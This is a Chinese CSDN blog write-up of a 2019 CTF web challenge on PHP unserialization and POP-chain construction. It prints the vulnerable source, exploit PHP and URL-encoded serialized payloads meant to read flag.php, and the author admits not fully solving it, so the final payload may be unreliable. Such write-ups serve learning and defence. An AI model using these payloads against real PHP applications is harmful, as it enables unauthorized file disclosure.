2019安恒一月月赛web1-babygo

最新推荐文章于 2023-06-24 12:03:22 发布
最新推荐文章于 2023-06-24 12:03:22 发布
阅读量1.8k 收藏 2
点赞数 1
分类专栏: # CTF-WP 文章标签: 反序列化 POP链构造
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syy0201/article/details/86668428
版权

web1-babygo

考察知识点:

  • PHP反序列化
  • POP链构造

由于还是个萌新…只会一点反序列化,还是第一次知道POP链构造,哭了
虽然没有写出来,但是想记录下这次学习的过程
参考链接:https://www.anquanke.com/post/id/170341
下面为题目源码

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new sec;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename;     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  

if (isset($_GET['data']))  
{ 
    $Input_data = unserialize($_GET['data']);
    echo $Input_data; 
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

大致浏览一下后,
必须满足

$this->nice->aaa === $this->nice->bbb

而题目中给出

$this->nice->aaa = $sth

s t h 是 一 个 未 知 参 数 , 不 能 确 定 sth是一个未知参数,不能确定 sthaaa

但是关键代码在cool类的read方法中,但是baby类中调用的却是是sec类的read方法,这个时候就要用到POP链构造啦
POP链构造
一般的序列化攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来
参考链接:POP的链构造

<?php  
error_reporting(0); 
//include 'flag.php';
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new cool;//改为cool
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename='flag.php';     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  

$test = new baby();
echo urlencode(serialize($test)).'<br>';
echo serialize($test);
echo '<br>';
?>

通过使用指针,这样bbb会跟随aaa动态改变

$a = new baby();
$a->bbb =&$a->aaa

则payload为:

O:4:"baby":3:{s:9:"*skyobj";O:4:"cool":3:{s:8:"filename";N;s:4:"nice";N;s:6:"amzing";N;}s:3:"aaa";N;s:3:"bbb";R:6;}

url编码后:

O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A6%3B%7D

最后的exp:

<?php  
class baby 
{   
    protected $skyobj;    
    public $aaa;
    public $bbb;
    function __construct() 
    {          
        $this->skyobj = new cool;   
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
        {
            return $this->skyobj->read();      
        }
    }  
}  
class cool 
{    
    public $filename='./flag.php';     
    public $nice;
    public $amzing='O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A6%3B%7D'; 
}   
$a = new baby();
// $a->bbb =&$a->aaa;
echo urlencode(serialize($a));
?>

最后的payload:

O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A10%3A%22.%2Fflag.php%22%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3Bs%3A227%3A%22O%253A4%253A%2522baby%2522%253A3%253A%257Bs%253A9%253A%2522%2500%252A%2500skyobj%2522%253BO%253A4%253A%2522cool%2522%253A3%253A%257Bs%253A8%253A%2522filename%2522%253BN%253Bs%253A4%253A%2522nice%2522%253BN%253Bs%253A6%253A%2522amzing%2522%253BN%253B%257Ds%253A3%253A%2522aaa%2522%253BN%253Bs%253A3%253A%2522bbb%2522%253BR%253A6%253B%257D%22%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BN%3B%7D
0nc3
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2018-10月逆向题目
10-29
2018年10月逆向题目。
7月月wp
T19er的博客
07-15 1087
先base6解码,后base64 得到 Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\RealVNC] [HKEY_CURRENT_USER\Software\RealVNC\vnclicensewiz] "_AnlClientId"="8f5cc378-2e1d-4670-80e0-d2d81d882561"...
5月web题目做题记录
0verWatch的博客
05-24 3523
奇怪的恐龙特性 这是一道代码审计的题目,又发现了一个我以前没见过的知识点,可以详细看看这个链接 https://wooyun.shuimugan.com/bug/view?bug_no=64792 从上面可以看出,简单点解释就是当代码中存在$_REQUEST['user_id']里面类似的参数的时候,我们在url上可以这样a.php?user.id传参去进行绕过,这样进去之后也能表示$_...
babyGo(2019.1 pop链的构造)
stepone4ward的博客
02-24 2199
周周练的时候看了一叶飘零师傅的博客才知道pop链的存在(还是太菜了啊),先来学习一下关于pop链的知识。 再看一看这道题目的baby类 也就是说这道题目中的类baby调用了sec类的read()方法。l 但是sec类的read()是一个全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。 这个时候就要利用最开始提到的...
VNCTF2023 babygo backdoor部分payload详解
m0_73606240的博客
02-26 317
看了几个人的vnctf2023的web复现,我觉得部分人可能会觉得backdoor部分的payload有点难理解,这里帮他们补充一下,先上源码
CTF中PHP相关题目考点总结(二)
weixin_68789096的博客
06-24 1107
本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。
2019一月新春贺岁writeup
筱阳的博客
01-27 4228
Simple php http://101.71.29.5:10004/robots.txt http://101.71.29.5:10004/admin ThinkPHP3.2.3 http://101.71.29.5:10004/index.php?username[0]=bind&amp;amp;amp;amp;amp;amp;amp;username[1]=0 and updatexml(1,concat(0x7,user(),0x7...
杯月题目参源码+项目说明.zip
最新发布
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞项目学习资料,作为参考学习借鉴。 ...杯月题目参源码+项目说明.zip
8月应急响应题目回顾-附件资源
03-05
8月应急响应题目回顾-附件资源
信息2010-2011-WEB-零日漏洞全报告
10-23
信息2010-2011-WEB-零日漏洞全报告 信息2010-2011-WEB-零日漏洞全报告
明鉴web漏洞扫描器
01-20
明鉴Web漏洞扫描器】是一款专业的网络全工具,主要针对Web应用程序的全性进行深度检测,以发现潜在的漏洞并帮助企业或个人提前预防网络攻击。这款扫描器使用了先进的扫描技术和策略,能够自动化地执行多种...
CTF--baby_web
qq_40730029的博客
04-20 1755
CTF之攻防世界高手进阶题 baby_web 题目:想想初始页面是哪个 进入场景之后显示如下,跳到的是1.php,用抓包软件burpsuite抓包 在抓取到的信息右键发送到Repeater 点击GO页面如下,发现flag出现了 ...
记一道CTF题babyphp之学习代码注入
xiaotaode2012的专栏
08-18 5324
0x00写在前面的话 最近打算刷刷CTF题目,提升一下自身的见识面,这里碰到了一个代码注入的题目特作记录,大牛勿喷。。。 0x01做题的整体思路 做题的地址,http://web.jarvisoj.com:32798/ 打开地址,随机点击发现都是展示对应的界面,做过开发的我,直觉告诉我应该是传入一个字符串展示对应页面,这样我随机点了一下,发现about里面有
170917 逆向-WHCTF(BabyHack)
whklhhhh的博客
09-17 773
1625-5 王子昂 总结《2017年9月17日》 【连续第350天总结】 A. XCTF-Reverse B.EasyHook刚开始看这个名字还以为要注入DLL啥的呢(:з」∠)忐忑不地打开发现结构挺简单:int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax@2
php反序列化总结(二)
qq_43801002的博客
05-17 514
反序列化与POP CHAIN POP CHAIN:把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与类中的敏感函数和属性相关联,就是POP CHAIN 。此时类中所有的敏感属性都属于可控的。当unserialize()传入的参数可控,便可以通过反序列化漏洞控制POP CHAIN达到利用特定漏洞的效果。 通俗点就是:反序列化中,如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 举一个小例子
9月部分复现记录
0verWatch的博客
09-30 1870
前言 赶紧趁着电脑的屏幕修好了,刚好web题目有复现,赶紧做。。。。。又从这几个题目里面学习到新知识了小结一下 正文 web babybypass 这个题目我记得我当初做的时候是一直考虑着用$以及_去绕过这些数字字母之类的东西,突然发现他这个题目里面把那个$以及_也经过了过滤,这样的话就少了很多可能性,而且这题比原题的限制长度小了,更有难度。现在就开始总结一下从这个题目学到的知识点 1.ph...
12月Web题解
0verWatch的博客
12-22 2869
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
writeup 2019年1月
SsMing的博客
01-26 2932
  目录 web1 pwn2 misc1 misc2 reverse1 crypt1 新的一年,各位师傅太强了 web1 访问后看见源码 &lt;?php @error_reporting(1); #include 'flag.php'; class baby { protected $skyobj; public $aaa; pu...
CTF-19年二月月部分writeup
weixin_33968104的博客
02-26 1642
CTF-19年二月月部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d911017c592,那么就奇怪了,这个??是什么东西,数一下加上??正好32位,应该是个MD5了,索性直接百度一下, 第一关答案出来了,试过了MD5值不对,hell...
明御审计0day漏洞
08-15
根据所提供的引用内容,我找不到与"明御审计0day漏洞"相关的信息。请提供更多的背景信息或者详细描述问题,以便我能够更好地回答你的问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [2019西湖论剑 | 信息范渊:新时代网络全需要“实智明归”](https://blog.csdn.net/weixin_34341229/article/details/89557181)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [最新漏洞POC_exp集合站 IT设备默认用户名密码 证语网络全Lab](https://blog.csdn.net/weixin_42744595/article/details/132197898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值